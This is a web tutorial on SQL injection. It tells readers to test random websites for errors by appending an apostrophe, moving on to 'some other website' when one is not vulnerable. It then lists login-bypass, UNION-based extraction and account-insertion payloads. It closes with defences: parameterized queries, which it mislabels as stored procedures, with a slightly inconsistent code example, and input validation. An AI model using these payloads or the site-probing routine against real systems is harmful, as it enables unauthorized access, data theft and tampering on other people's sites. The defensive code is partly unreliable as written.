SQL injection is an attack in which malicious code or SQL query is entered via input field (username,password etc) of an application or web page ,that is later passed and executed on the back-end database(SQL Server).The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that’s eventually executed by the database.For Example:- Inserting SQL queries like SELECT,INSERT,UPDATE in input fields and executing these queries to effect the database.
How to check if a website is vulnerable to SQL INJECTION attack?
Once you open the website by entering URL in and get the website opened.
Say http://www.xyz.com/index.php?catid=1
Add a ' (apostrophe) in the end of URL. Such that the URL looks like
hxxp://www.abcd.com/index.php?catid=1'
If the webpage returns a SQL error, then the page is vulnerable to SQL. If it loads normally,than the page is fine and we have to find some other website and apply the same procedure.
Typical errors you'll get after employing the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_preg_match():
Warning: mysql_result():
Once you get the SQL error or warning then you are quite able to get to the next step.Next step is to employ cheats on input fields. Attackers employ cheats and queries in the input field to harm the data. Some of the common cheats that are used during SQL Injection are :-
------------------------------------------
SQL Injection Cheats
------------------------------------------
Cheats to bypass Login Screens
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' OR '1'='1
' OR 'A'='A
' having 1=1 --
' group by CustNo having 1=1 --
' group by UserID,CustNo having 1=1 --
An attacker may use SQL injection to retrieve data from tables as well. This can be done using the SQL UNION SELECT statement.
'union select sum(UserID) from members --
'union select sum(CustNo) from members --
'union select sum(CustNo) from members --
'; insert into tblCustomers values('5345','deviluser','devilpass','34343434')--
'; insert into tblCustomers values('5345','deviluser','devilpass','34343434')--
Once attacker enters the webpage and find ways to get in more deeper ,he can retrieve,modify,destroy whole database by appending his own structural queries.
HOW SQL INJECTION WORKS ...Check out the video..
Ways to protect your website from SQL Injection :
However there are ways to protect your website from SQL Injection. Here are two possible ways to protect your web application against SQL injection attacks:
1.Use a stored procedure rather than a dynamically built SQL query string. The manner in which parameters are passed to SQL Server stored procedures prevents the use of apostrophes and hyphens.
Example of how to use stored procedures in ASP.NET:
C# example
String selectCmd = "select * from Authors where state = @username";
SqlConnection myConnection = new SqlConnection("server=...");
SqlDataAdapter myCommand = new SqlDataAdapter(selectCmd, myConnection);
myCommand.SelectCommand.Parameters.Add(new SqlParameter("@username",
SqlDbType.NVarChar, 20));
myCommand.SelectCommand.Parameters["@username"].Value = UserNameField.Value;
Visual Basic example
Dim DS As DataSet
Dim MyConnection As SqlConnection
Dim MyCommand As SqlDataAdapter
Dim SelectCommand As String = "select * from users where username = @username"
MyCommand.SelectCommand.Parameters.Add(New SqlParameter("@username",
SqlDbType.NVarChar, 20))
MyCommand.SelectCommand.Parameters("@username").Value = UserNameField.Value
2.You can add input validation to Web Forms pages by using validation controls. Validation controls provide an easy-to-use mechanism for all common types of standard validation (for example, testing for valid dates or values within a range), plus ways to provide custom-written validation. In addition,validation controls allow you to completely customize how error information is displayed to the user.Validation controls can be used with any controls that are processed in a Web Forms page's class file,including both HTML and Web server controls.
References
IBM App Scan
